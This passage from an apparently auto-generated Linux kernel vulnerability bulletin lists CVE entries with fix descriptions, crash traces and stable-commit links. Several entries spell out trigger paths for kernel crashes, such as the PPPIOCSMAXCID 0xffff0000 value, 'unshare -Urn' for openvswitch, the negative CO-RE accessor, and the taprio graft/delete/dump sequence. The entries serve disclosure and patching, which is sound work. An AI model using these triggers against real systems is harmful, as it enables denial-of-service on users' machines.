drm_dp_mst_wq drm_dp_delayed_destroy_work [drm_display_helper] <4> [515.287303] Call Trace: <4> [515.287304] <TASK> <4> [515.287306] dump_stack_lvl+0xc1/0xf0 <4> [515.287313] dump_stack+0x10/0x20 <4> [515.287316] __ubsan_handle_shift_out_of_bounds+0x133/0x2e0 <4> [515.287324] ? drm_atomic_get_private_obj_state+0x186/0x1d0 <4> [515.287333] drm_dp_atomic_release_time_slots.cold+0x17/0x3d [drm_display_helper] <4> [515.287355] mst_connector_atomic_check+0x159/0x180 [xe] <4> [515.287546] drm_atomic_helper_check_modeset+0x4d9/0xfa0 <4> [515.287550] ? __ww_mutex_lock.constprop.0+0x6f/0x1a60 <4> [515.287562] intel_atomic_check+0x119/0x2b80 [xe] <4> [515.287740] ? find_held_lock+0x31/0x90 <4> [515.287747] ? lock_release+0xce/0x2a0 <4> [515.287754] drm_atomic_check_only+0x6a2/0xb40 <4> [515.287758] ? drm_atomic_add_affected_connectors+0x12b/0x140 <4> [515.287765] drm_atomic_commit+0x6e/0xf0 <4> [515.287766] ? _pfx__drm_printfn_info+0x10/0x10 <4> [515.287774] drm_client_modeset_commit_atomic+0x25c/0x2b0 <4> [515.287794] drm_client_modeset_commit_locked+0x60/0x1b0 <4> [515.287795] ? mutex_lock_nested+0x1b/0x30 <4> [515.287801] drm_client_modeset_commit+0x26/0x50 <4> [515.287804] __drm_fb_helper_restore_fbdev_mode_unlocked+0xdc/0x110 <4> [515.287810] drm_fb_helper_hotplug_event+0x120/0x140 <4> [515.287814] drm_fbdev_client_hotplug+0x28/0xd0 <4> [515.287819] drm_client_hotplug+0x6c/0xf0 <4> [515.287824] drm_client_dev_hotplug+0x9e/0xd0 <4> [515.287829] drm_kms_helper_hotplug_event+0x1a/0x30 <4> [515.287834] drm_dp_delayed_destroy_work+0x3df/0x410 [drm_display_helper] <4> [515.287861] process_one_work+0x22b/0x6f0 <4> [515.287874] worker_thread+0x1e8/0x3d0 <4> [515.287879] ? __pfx_worker_thread+0x10/0x10 <4> [515.287882] kthread+0x11c/0x250 <4> [515.287886] ? __pfx_kthread+0x10/0x10 <4> [515.287890] ret_from_fork+0x2d7/0x310 <4> [515.287894] ? __pfx_kthread+0x10/0x10 <4> [515.287897] ret_from_fork_asm+0x1a/0x30 | 2026-05-27 | not yet calculated | CVE-2025-71305 | https://git.kernel.org/stable/c/95dbd525efce2a9e9e1c50ad15213de644c85ad0 https://git.kernel.org/stable/c/ac9a7c329a5610051fc476644c9b9145a5965ecb https://git.kernel.org/stable/c/3f44cdb5371faf225af37d5caba8f21ec0572469 https://git.kernel.org/stable/c/4d2ccdea18b564e3f73e3e543854acea64e6277d https://git.kernel.org/stable/c/d6afc7539ce06dadfa5b4787b3cfe79b95d8f67a https://git.kernel.org/stable/c/342ccffd9f77fc29fe1c05fd145e4d842bd2feaa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ima: Fix stack-out-of-bounds in is_bprm_creds_for_exec() KASAN reported a stack-out-of-bounds access in ima_appraise_measurement from is_bprm_creds_for_exec: BUG: KASAN: stack-out-of-bounds in ima_appraise_measurement+0x12dc/0x16a0 Read of size 1 at addr ffffc9000160f940 by task sudo/550 The buggy address belongs to stack of task sudo/550 and is located at offset 24 in frame: ima_appraise_measurement+0x0/0x16a0 This frame has 2 objects: [48, 56) 'file' [80, 148) 'hash' This is caused by using container_of on the *file pointer. This offset calculation is what triggers the stack-out-of-bounds error. In order to fix this, pass in a bprm_is_check boolean which can be set depending on how process_measurement is called. If the caller has a linux_binprm pointer and the function is BPRM_CHECK we can determine is_check and set it then. Otherwise set it to false. | 2026-05-27 | not yet calculated | CVE-2025-71306 | https://git.kernel.org/stable/c/ab3d16da982a4ebb715d487dbf9dd66e3990d935 https://git.kernel.org/stable/c/377cae9851e8559e9d8b82a78c1ac0abeb18839c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix NULL pointer dereference on panthor_fw_unplug This patch removes the MCU halt and wait for halt procedures during panthor_fw_unplug() as the MCU can be in a variety of states or the FW may not even be loaded/initialized at all, the latter of which can lead to a NULL pointer dereference. It should be safe on unplug to just disable the MCU without waiting for it to halt as it may not be able to. | 2026-05-27 | not yet calculated | CVE-2025-71307 | https://git.kernel.org/stable/c/aab8b8a42e206a399fe3a5ed4b4cbb45ff6c546c https://git.kernel.org/stable/c/920c6af98e98e6afedf6318a75bac95af8415c6c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix potential NULL pointer dereference in context cleanup aie_destroy_context() is invoked during error handling in aie2_create_context(). However, aie_destroy_context() assumes that the context's mailbox channel pointer is non-NULL. If mailbox channel creation fails, the pointer remains NULL and calling aie_destroy_context() can lead to a NULL pointer dereference. In aie2_create_context(), replace aie_destroy_context() with a function which requests the firmware to remove the context created previously. | 2026-05-27 | not yet calculated | CVE-2025-71308 | https://git.kernel.org/stable/c/2611c9616cb52d3ed54a6095d72d18e645a6955a https://git.kernel.org/stable/c/97f27573837ef96b4ba42af463cc800cab615c0e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: fix deadlock in ni_read_folio_cmpr Syzbot reported a task hung in ni_readpage_cmpr (now ni_read_folio_cmpr). This is caused by a lock inversion deadlock involving the inode mutex (ni_lock) and page locks. Scenario: 1. Task A enters ntfs_read_folio() for page X. It acquires ni_lock. 2. Task A calls ni_read_folio_cmpr(), which attempts to lock all pages in the compressed frame (including page Y). 3. Concurrently, Task B (e.g., via readahead) has locked page Y and calls ntfs_read_folio(). 4. Task B waits for ni_lock (held by A). 5. Task A waits for page Y lock (held by B). -> DEADLOCK. The fix is to restructure locking: do not take ni_lock in ntfs_read_folio(). Instead, acquire ni_lock inside ni_read_folio_cmpr() ONLY AFTER all required page locks for the frame have been successfully acquired. This restores the correct lock ordering (Page Lock -> ni_lock) consistent with VFS. [almaz.alexandrovich@paragon-software.com: ni_readpage_cmpr was renamed to ni_read_folio_cmpr] | 2026-05-27 | not yet calculated | CVE-2025-71309 | https://git.kernel.org/stable/c/cfe246b318106e1691bd6c9466c739e8559d25c2 https://git.kernel.org/stable/c/e37a75bb866c29da954b51d0dd7670406246d9ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Initialize new folios before use KMSAN reports an uninitialized value in longest_match_std(), invoked from ntfs_compress_write(). When new folios are allocated without being marked uptodate and ni_read_frame() is skipped because the caller expects the frame to be completely overwritten, some reserved folios may remain only partially filled, leaving the rest memory uninitialized. | 2026-05-27 | not yet calculated | CVE-2025-71311 | https://git.kernel.org/stable/c/dd6c81527d097b3b0bf5a15c2fdc9657d045144c https://git.kernel.org/stable/c/5a30cc03bde169ad558695b26da6ea7e55f6194a https://git.kernel.org/stable/c/41d79f8e2a36622d148719bf7c18b46ac1264284 https://git.kernel.org/stable/c/f223ebffa185cc8da934333c5a31ff2d4f992dc9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: fix ntfs_mount_options leak in ntfs_fill_super() In ntfs_fill_super(), the fc->fs_private pointer is set to NULL without first freeing the memory it points to. This causes the subsequent call to ntfs_fs_free() to skip freeing the ntfs_mount_options structure. This results in a kmemleak report: unreferenced object 0xff1100015378b800 (size 32): comm "mount", pid 582, jiffies 4294890685 hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 ed ff ed ff 00 04 00 00 ................ backtrace (crc ed541d8c): __kmalloc_cache_noprof+0x424/0x5a0 __ntfs_init_fs_context+0x47/0x590 alloc_fs_context+0x5d8/0x960 __x64_sys_fsopen+0xb1/0x190 do_syscall_64+0x50/0x1f0 entry_SYSCALL_64_after_hwframe+0x76/0x7e This issue can be reproduced using the following commands: fallocate -l 100M test.file mount test.file /tmp/test Since sbi->options is duplicated from fc->fs_private and does not directly use the memory allocated for fs_private, it is unnecessary to set fc->fs_private to NULL. Additionally, this patch simplifies the code by utilizing the helper function put_mount_options() instead of open-coding the cleanup logic. | 2026-05-27 | not yet calculated | CVE-2025-71312 | https://git.kernel.org/stable/c/dac871d833b09495198dcac81d2ebaa8db11acbc https://git.kernel.org/stable/c/f7edab0cee03a1cbe0e55a7bcab8d2d8b6b74278 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix null-ptr-deref in l2cap_sock_state_change_cb() Add the same NULL guard already present in l2cap_sock_resume_cb() and l2cap_sock_ready_cb(). | 2026-05-26 | not yet calculated | CVE-2026-45834 | https://git.kernel.org/stable/c/5105f3e6b2df619c635b5f6a49fac131a36c7952 https://git.kernel.org/stable/c/c88c185ae0a1067823661b220aeea613df2c127b https://git.kernel.org/stable/c/1810e42ff6716f320c7269d5850eca48b07b7427 https://git.kernel.org/stable/c/a2dcf1a61d056aef15b63c6eae9441344d624389 https://git.kernel.org/stable/c/2ff1a41a912de8517b4482e946dd951b7d80edbf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix null-ptr-deref in l2cap_sock_new_connection_cb() Add the same NULL guard already present in l2cap_sock_resume_cb() and l2cap_sock_ready_cb(). | 2026-05-26 | not yet calculated | CVE-2026-45835 | https://git.kernel.org/stable/c/ab77c8bc30269bee15d917059a66bea48909f5f0 https://git.kernel.org/stable/c/bc3bb9f40da8e53896abc2d29c6d0c6686fe4ab9 https://git.kernel.org/stable/c/741e6024e31587b0c021b6616a9e428a4ea0b64a https://git.kernel.org/stable/c/76083fb80f5a38ac13326b2d810f66bd07771eea https://git.kernel.org/stable/c/0a120d96166301d7a95be75b52f843837dbd1219 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix null-ptr-deref in l2cap_sock_get_sndtimeo_cb() Add the same NULL guard already present in l2cap_sock_resume_cb() and l2cap_sock_ready_cb(). | 2026-05-26 | not yet calculated | CVE-2026-45836 | https://git.kernel.org/stable/c/cf1fd517f892ded88168df878f834b625133f86d https://git.kernel.org/stable/c/58dc5e3d8768e121907608e6e196a908512fb083 https://git.kernel.org/stable/c/32bd343803d4ba47cc516f9d5f037f01b855d767 https://git.kernel.org/stable/c/a93d66907dd4d29b65c9797a93784bf61906d6d6 https://git.kernel.org/stable/c/78a88d43dab8d23aeef934ed8ce34d40e6b3d613 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix use-after-free in arena_vm_close on fork arena_vm_open() only bumps vml->mmap_count but never registers the child VMA in arena->vma_list. The vml->vma always points at the parent VMA, so after parent munmap the pointer dangles. If the child then calls bpf_arena_free_pages(), zap_pages() reads the stale vml->vma triggering use-after-free. Fix this by preventing the arena VMA from being inherited across fork with VM_DONTCOPY, and preventing VMA splits via the may_split callback. Also reject mremap with a .mremap callback returning -EINVAL. A same-size mremap(MREMAP_FIXED) on the full arena VMA reaches copy_vma() through the following path: check_prep_vma() - returns 0 early: new_len == old_len skips VM_DONTEXPAND check prep_move_vma() - vm_start == old_addr and vm_end == old_addr + old_len so may_split is never called move_vma() copy_vma_and_data() copy_vma() vm_area_dup() - copies vm_private_data (vml pointer) vm_ops->open() - bumps vml->mmap_count vm_ops->mremap() - returns -EINVAL, rollback unmaps new VMA The refcount ensures the rollback's arena_vm_close does not free the vml shared with the original VMA. | 2026-05-27 | not yet calculated | CVE-2026-45837 | https://git.kernel.org/stable/c/723b9fa930cc277c15ce6b9ec9feec828cfac9d7 https://git.kernel.org/stable/c/d18099f19e53250f8ad2801498b88cec29d9107a https://git.kernel.org/stable/c/201128fcc7b213d27ab77bc4e89488b41796480f https://git.kernel.org/stable/c/4fddde2a732de60bb97e3307d4eb69ac5f1d2b74 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: fix end-of-list detection in cgroup_storage_get_next_key() list_next_entry() never returns NULL -- when the current element is the last entry it wraps to the list head via container_of(). The subsequent NULL check is therefore dead code and get_next_key() never returns -ENOENT for the last element, instead reading storage->key from a bogus pointer that aliases internal map fields and copying the result to userspace. Replace it with list_entry_is_head() so the function correctly returns -ENOENT when there are no more entries. | 2026-05-27 | not yet calculated | CVE-2026-45838 | https://git.kernel.org/stable/c/b4b5a20bed82130da2f2818f04d52378952fbd0b https://git.kernel.org/stable/c/85a2f30e40f7468db732f55659bc6318874f49af https://git.kernel.org/stable/c/32ce55d424395904986f5066f8755f6cb9993377 https://git.kernel.org/stable/c/fc39753b7f92e09177777e9c648afe5aa3abb81f https://git.kernel.org/stable/c/5828b9e5b272ecff7cf5d345128d3de7324117f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: reject negative CO-RE accessor indices in bpf_core_parse_spec() CO-RE accessor strings are colon-separated indices that describe a path from a root BTF type to a target field, e.g. "0:1:2" walks through nested struct members. bpf_core_parse_spec() parses each component with sscanf("%d"), so negative values like -1 are silently accepted. The subsequent bounds checks (access_idx >= btf_vlen(t)) only guard the upper bound and always pass for negative values because C integer promotion converts the __u16 btf_vlen result to int, making the comparison (int)(-1) >= (int)(N) false for any positive N. When -1 reaches btf_member_bit_offset() it gets cast to u32 0xffffffff, producing an out-of-bounds read far past the members array. A crafted BPF program with a negative CO-RE accessor on any struct that exists in vmlinux BTF (e.g. task_struct) crashes the kernel deterministically during BPF_PROG_LOAD on any system with CONFIG_DEBUG_INFO_BTF=y (default on major distributions). The bug is reachable with CAP_BPF: BUG: unable to handle page fault for address: ffffed11818b6626 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page Oops: Oops: 0000 [#1] SMP KASAN NOPTI CPU: 0 UID: 0 PID: 85 Comm: poc Not tainted 7.0.0-rc6 #18 PREEMPT(full) RIP: 0010:bpf_core_parse_spec (tools/lib/bpf/relo_core.c:354) RAX: 00000000ffffffff Call Trace: <TASK> bpf_core_calc_relo_insn (tools/lib/bpf/relo_core.c:1321) bpf_core_apply (kernel/bpf/btf.c:9507) check_core_relo (kernel/bpf/verifier.c:19475) bpf_check (kernel/bpf/verifier.c:26031) bpf_prog_load (kernel/bpf/syscall.c:3089) __sys_bpf (kernel/bpf/syscall.c:6228) </TASK> CO-RE accessor indices are inherently non-negative (struct member index, array element index, or enumerator index), so reject them immediately after parsing. | 2026-05-27 | not yet calculated | CVE-2026-45839 | https://git.kernel.org/stable/c/3ff85ae79e1a74baeb916b78a63d821f6d19a994 https://git.kernel.org/stable/c/36a9012f76ba8d9189ae56a1f8bb7c87c07a1f3a https://git.kernel.org/stable/c/76f2ebaf79a9ae6d0737b87f045fe769e425d78f https://git.kernel.org/stable/c/99dbab7b5a12d8f58d5b0aa2f7a1fe656a70f4b2 https://git.kernel.org/stable/c/1c22483a2c4bbf747787f328392ca3e68619c4dc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: openvswitch: cap upcall PID array size and pre-size vport replies The vport netlink reply helpers allocate a fixed-size skb with nlmsg_new(NLMSG_DEFAULT_SIZE, ...) but serialize the full upcall PID array via ovs_vport_get_upcall_portids(). Since ovs_vport_set_upcall_portids() accepts any non-zero multiple of sizeof(u32) with no upper bound, a CAP_NET_ADMIN user can install a PID array large enough to overflow the reply buffer, causing nla_put() to fail with -EMSGSIZE and hitting BUG_ON(err < 0). On systems with unprivileged user namespaces enabled (e.g., Ubuntu default), this is reachable via unshare -Urn since OVS vport mutation operations use GENL_UNS_ADMIN_PERM. kernel BUG at net/openvswitch/datapath.c:2414! Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI CPU: 1 UID: 0 PID: 65 Comm: poc Not tainted 7.0.0-rc7-00195-geb216e422044 #1 RIP: 0010:ovs_vport_cmd_set+0x34c/0x400 Call Trace: <TASK> genl_family_rcv_msg_doit (net/netlink/genetlink.c:1116) genl_rcv_msg (net/netlink/genetlink.c:1194) netlink_rcv_skb (net/netlink/af_netlink.c:2550) genl_rcv (net/netlink/genetlink.c:1219) netlink_unicast (net/netlink/af_netlink.c:1344) netlink_sendmsg (net/netlink/af_netlink.c:1894) __sys_sendto (net/socket.c:2206) __x64_sys_sendto (net/socket.c:2209) do_syscall_64 (arch/x86/entry/syscall_64.c:63) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) </TASK> Kernel panic - not syncing: Fatal exception Reject attempts to set more PIDs than nr_cpu_ids in ovs_vport_set_upcall_portids(), and pre-compute the worst-case reply size in ovs_vport_cmd_msg_size() based on that bound, similar to the existing ovs_dp_cmd_msg_size(). nr_cpu_ids matches the cap already used by the per-CPU dispatch configuration on the datapath side (ovs_dp_cmd_fill_info() serialises at most nr_cpu_ids PIDs), so the two sides stay consistent. | 2026-05-27 | not yet calculated | CVE-2026-45840 | https://git.kernel.org/stable/c/f9ef3db77a383d66847fd082c2b437d8ae4d9c63 https://git.kernel.org/stable/c/f99ac36b5d7c719d08a69fcdecce40f78a874e15 https://git.kernel.org/stable/c/fa6e90bc443bed8dc0d55bc5ea5b27ffdfe37704 https://git.kernel.org/stable/c/1d6c02b86329883aa467a3a61f8d34369db73a2f https://git.kernel.org/stable/c/2091c6aa0df6aba47deb5c8ab232b1cb60af3519 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_osf: fix divide-by-zero in OSF_WSS_MODULO nf_osf_match_one() computes ctx->window % f->wss.val in the OSF_WSS_MODULO branch with no guard for f->wss.val == 0. A CAP_NET_ADMIN user can add such a fingerprint via nfnetlink; a subsequent matching TCP SYN divides by zero and panics the kernel. Reject the bogus fingerprint in nfnl_osf_add_callback() above the per-option for-loop. f->wss is per-fingerprint, not per-option, so the check must run regardless of f->opt_num (including 0). Also reject wss.wc >= OSF_WSS_MAX; nf_osf_match_one() already treats that as "should not happen". Crash: Oops: divide error: 0000 [#1] SMP KASAN NOPTI RIP: 0010:nf_osf_match_one (net/netfilter/nfnetlink_osf.c:98) Call Trace: <IRQ> nf_osf_match (net/netfilter/nfnetlink_osf.c:220) xt_osf_match_packet (net/netfilter/xt_osf.c:32) ipt_do_table (net/ipv4/netfilter/ip_tables.c:348) nf_hook_slow (net/netfilter/core.c:622) ip_local_deliver (net/ipv4/ip_input.c:265) ip_rcv (include/linux/skbuff.h:1162) __netif_receive_skb_one_core (net/core/dev.c:6181) process_backlog (net/core/dev.c:6642) __napi_poll (net/core/dev.c:7710) net_rx_action (net/core/dev.c:7945) handle_softirqs (kernel/softirq.c:622) | 2026-05-27 | not yet calculated | CVE-2026-45841 | https://git.kernel.org/stable/c/8def8fbd23f40e945febe913d04b731012ce0082 https://git.kernel.org/stable/c/c55940895245d8ef658ab381248a28755218d625 https://git.kernel.org/stable/c/fb965b1cfe92b28d28b5ebe3116b81dbef9f2d2f https://git.kernel.org/stable/c/9a05e195618a6d474f2bcd5b6376d0ffc2f00366 https://git.kernel.org/stable/c/2195574dc6d9017d32ac346987e12659f931d932 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: slip: reject VJ receive packets on instances with no rstate array slhc_init() accepts rslots == 0 as a valid configuration, with the documented meaning of 'no receive compression'. In that case the allocation loop in slhc_init() is skipped, so comp->rstate stays NULL and comp->rslot_limit stays 0 (from the kzalloc of struct slcompress). The receive helpers do not defend against that configuration. slhc_uncompress() dereferences comp->rstate[x] when the VJ header carries an explicit connection ID, and slhc_remember() later assigns cs = &comp->rstate[...] after only comparing the packet's slot number to comp->rslot_limit. Because rslot_limit is 0, slot 0 passes the range check, and the code dereferences a NULL rstate. The configuration is reachable in-tree through PPP. PPPIOCSMAXCID stores its argument in a signed int, and (val >> 16) uses arithmetic shift. Passing 0xffff0000 therefore sign-extends to -1, so val2 + 1 is 0 and ppp_generic.c ends up calling slhc_init(0, 1). Because /dev/ppp open is gated by ns_capable(CAP_NET_ADMIN), the whole path is reachable from an unprivileged user namespace. Once the malformed VJ state is installed, any inbound VJ-compressed or VJ-uncompressed frame that selects slot 0 crashes the kernel in softirq context: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] RIP: 0010:slhc_uncompress (drivers/net/slip/slhc.c:519) Call Trace: <TASK> ppp_receive_nonmp_frame (drivers/net/ppp/ppp_generic.c:2466) ppp_input (drivers/net/ppp/ppp_generic.c:2359) ppp_async_process (drivers/net/ppp/ppp_async.c:492) tasklet_action_common (kernel/softirq.c:926) handle_softirqs (kernel/softirq.c:623) run_ksoftirqd (kernel/softirq.c:1055) smpboot_thread_fn (kernel/smpboot.c:160) kthread (kernel/kthread.c:436) ret_from_fork (arch/x86/kernel/process.c:164) </TASK> Reject the receive side on such instances instead of touching rstate. slhc_uncompress() falls through to its existing 'bad' label, which bumps sls_i_error and enters the toss state. slhc_remember() mirrors that with an explicit sls_i_error increment followed by slhc_toss(); the sls_i_runt counter is not used here because a missing rstate is an internal configuration state, not a runt packet. The transmit path is unaffected: the only in-tree caller that picks rslots from userspace (ppp_generic.c) still supplies tslots >= 1, and slip.c always calls slhc_init(16, 16), so comp->tstate remains valid and slhc_compress() continues to work. | 2026-05-27 | not yet calculated | CVE-2026-45842 | https://git.kernel.org/stable/c/c6980e8b1a86288167f34966fa5219031999b6f1 https://git.kernel.org/stable/c/de42f86e2cf5028a97e74c25869d1a962b13c301 https://git.kernel.org/stable/c/9e1ff0eead073c4f46d874ad2526b7dda5465faf https://git.kernel.org/stable/c/7b0d9e878ec2b21d99ae8051b3dda59cdb66c152 https://git.kernel.org/stable/c/e76607442d5b73e1ba6768f501ef815bb58c2c0e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: arp_tables: fix IEEE1394 ARP payload parsing Weiming Shi says: "arp_packet_match() unconditionally parses the ARP payload assuming two hardware addresses are present (source and target). However, IPv4-over-IEEE1394 ARP (RFC 2734) omits the target hardware address field, and arp_hdr_len() already accounts for this by returning a shorter length for ARPHRD_IEEE1394 devices. As a result, on IEEE1394 interfaces arp_packet_match() advances past a nonexistent target hardware address and reads the wrong bytes for both the target device address comparison and the target IP address. This causes arptables rules to match against garbage data, leading to incorrect filtering decisions: packets that should be accepted may be dropped and vice versa. The ARP stack in net/ipv4/arp.c (arp_create and arp_process) already handles this correctly by skipping the target hardware address for ARPHRD_IEEE1394. Apply the same pattern to arp_packet_match()." Mangle the original patch to always return 0 (no match) in case user matches on the target hardware address which is never present in IEEE1394. Note that this returns 0 (no match) for both normal and inverse matches because matching on the target hardware address in ARPHRD_IEEE1394 has never been supported by arptables. This is intentional, matching on the target hardware address should never evaluate true for ARPHRD_IEEE1394. Moreover, adjust arpt_mangle to drop the packet too as AI suggests: In arpt_mangle, the logic assumes a standard ARP layout. Because IEEE1394 (FireWire) omits the target hardware address, the linear pointer arithmetic miscalculates the offset for the target IP address. This causes mangling operations to write to the wrong location, leading to packet corruption. To ensure safety, this patch drops packets (NF_DROP) when mangling is requested for these fields on IEEE1394 devices, as the current implementation cannot correctly map the FireWire ARP payload. This omits both mangling the target hardware and IP address. Even if IP address mangling should be possible in IEEE1394, this would require adjusting the arpt_mangle offset calculation, which has never been supported. Based on patch from Weiming Shi <bestswngs@gmail.com>. | 2026-05-27 | not yet calculated | CVE-2026-45844 | https://git.kernel.org/stable/c/ad9973df8e0eeb123d9ec4d18828e05b7d44ff4b https://git.kernel.org/stable/c/03ea11dbefaa55c502735ee551c89ef773fe753b https://git.kernel.org/stable/c/1c55053f8ffdc060006df898fd3664e3d1bfac7b https://git.kernel.org/stable/c/ac698d81fd6619c7504cee913f1cab5285fba1b7 https://git.kernel.org/stable/c/1e8e3f449b1e73b73a843257635b9c50f0cc0f0a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: taprio: fix NULL pointer dereference in class dump When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft() is called with new == NULL and stores NULL into q->qdiscs[cl - 1]. Subsequent RTM_GETTCLASS dump operations walk all classes via taprio_walk() and call taprio_dump_class(), which calls taprio_leaf() returning the NULL pointer, then dereferences it to read child->handle, causing a kernel NULL pointer dereference. The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user namespaces enabled, an unprivileged local user can trigger a kernel panic by creating a taprio qdisc inside a new network namespace, grafting an explicit child qdisc, deleting it, and requesting a class dump. The RTM_GETTCLASS dump itself requires no capability. Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f] RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2478) Call Trace: <TASK> tc_fill_tclass (net/sched/sch_api.c:1966) qdisc_class_dump (net/sched/sch_api.c:2326) taprio_walk (net/sched/sch_taprio.c:2514) tc_dump_tclass_qdisc (net/sched/sch_api.c:2352) tc_dump_tclass_root (net/sched/sch_api.c:2370) tc_dump_tclass (net/sched/sch_api.c:2431) rtnl_dumpit (net/core/rtnetlink.c:6864) netlink_dump (net/netlink/af_netlink.c:2325) rtnetlink_rcv_msg (net/core/rtnetlink.c:6959) netlink_rcv_skb (net/netlink/af_netlink.c:2550) </TASK> Fix this by substituting &noop_qdisc when new is NULL in taprio_graft(), a common pattern used by other qdiscs (e.g., multiq_graft()) to ensure the q->qdiscs[] slots are never NULL. This makes control-plane dump paths safe without requiring individual NULL checks. Since the data-plane paths (taprio_enqueue and taprio_dequeue_from_txq) previously had explicit NULL guards that would drop/skip the packet cleanly, update those checks to test for &noop_qdisc instead. Without this, packets would reach taprio_enqueue_one() which increments the root qdisc's qlen and backlog before calling the child's enqueue; noop_qdisc drops the packet but those counters are never rolled back, permanently inflating the root qdisc's statistics. After this change *old can be a valid qdisc, NULL, or &noop_qdisc. Only call qdisc_put(*old) in the first case to avoid decreasing noop_qdisc's refcount, which was never increased. | 2026-05-27 | not yet calculated | CVE-2026-45845 | https://git.kernel.org/stable/c/ec2501e361b08b50bcb1e7b3253fc861abbda28d https://git.kernel.org/stable/c/d02e2fbf60de46678e2ea698a6a904fd21e1cc31 https://git.kernel.org/stable/c/48b26d48e76221dc90b02bf5428bab53643461ca https://git.kernel.org/stable/c/8f1ff8866cb9f655e5faea6994eb902960be8e04 https://git.kernel.org/stable/c/3d07ca5c0fae311226f737963984bd94bb159a87 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bareudp: fix NULL pointer dereference in bareudp_fill_metadata_dst() bareudp_fill_metadata_dst() passes bareudp->sock to udp_tunnel6_dst_lookup() in the IPv6 path without a NULL check. The socket is only created in bareudp_open() and NULLed in bareudp_stop(), so calling this function while the device is down triggers a NULL dereference via sock->sk. BUG: kernel NULL pointer dereference, address: 0000000000000018 RIP: 0010:udp_tunnel6_dst_lookup (net/ipv6/ip6_udp_tunnel.c:160) Call Trace: <TASK> bareudp_fill_metadata_dst (drivers/net/bareudp.c:532) do_execute_actions (net/openvswitch/actions.c:901) ovs_execute_actions (net/openvswitch/actions.c:1589) ovs_packet_cmd_execute (net/openvswitch/datapath.c:700) genl_family_rcv_msg_doit (net/netlink/genetlink.c:1114) genl_rcv_msg (net/netlink/genetlink.c:1209) netlink_rcv_skb (net/netlink/af_netlink.c:2550) </TASK> Add a NULL check returning -ESHUTDOWN, consistent with the xmit paths in the same driver. | 2026-05-27 | not yet calculated | CVE-2026-45846 | https://git.kernel.org/stable/c/a0f4e4e8e0f5e24ddd83e3d1221732621cf34636 https://git.kernel.org/stable/c/35a115a204be08f97450b0389413e218268ef4a2 https://git.kernel.org/stable/c/74a02921c48fcd35a7881956c9e5c52b86595f5d https://git.kernel.org/stable/c/638905520fc4fae6a80991563f264131545ba3df https://git.kernel.org/stable/c/aa6c6d9ee064aabfede4402fd1283424e649ca19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: remove WARN_ON_ONCE when accessing forward path array Although unlikely, recent support for IPIP tunnels increases chances of reaching this WARN_ON_ONCE if userspace manages to build a sufficiently long forward path. Remove it. | 2026-05-27 | not yet calculated | CVE-2026-45847 | https://git.kernel.org/stable/c/548244c2f542aa0ad49453e9306e715a3877bc44 https://git.kernel.org/stable/c/dcf9b3c90e5560339649d088836529883fb509f3 https://git.kernel.org/stable/c/9464ca7a6e56ad1ebf48b2ad5c16871edfad10c6 https://git.kernel.org/stable/c/959ea349c7e2d4edf07b6838ca7e59345fe61a08 https://git.kernel.org/stable/c/50422613185d505201167e8bdd2f2700790d5db6 https://git.kernel.org/stable/c/a78d055ba7c31103ad02f8eceb0c452e154d2660 https://git.kernel.org/stable/c/008e7a7c293b30bc43e4368dac6ea3808b75a572 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix NULL sock in aa_sock_file_perm Deal with the potential that sock and sock-sk can be NULL during socket setup or teardown. This could lead to an oops. The fix for NULL pointer dereference in __unix_needs_revalidation shows this is at least possible for af_unix sockets. While the fix for af_unix sockets applies for newer mediation this is still the fall back path for older af_unix mediation and other sockets, so ensure it is covered. | 2026-05-27 | not yet calculated | CVE-2026-45848 | https://git.kernel.org/stable/c/68538ec34fcb4194c7961dc4eca6f5537fec8067 https://git.kernel.org/stable/c/5121b7283f1c46e4c06b88b1dda7b064429d77de https://git.kernel.org/stable/c/c11b7c3280d000376e27ebfed17ec7046699eab4 https://git.kernel.org/stable/c/0dc19bca22606f7a61d5988408f74e3ae0ef3486 https://git.kernel.org/stable/c/3852eb9a0392eb435c03dcb47d581bcfe6a9a95b https://git.kernel.org/stable/c/ccb66a3c6c8f51b3ed1bc003b70bb9ff99e8d835 https://git.kernel.org/stable/c/8a0ededbfcff74598f82f1d4b8ef9db28878b317 https://git.kernel.org/stable/c/00b67657535dfea56e84d11492f5c0f61d0af297 |
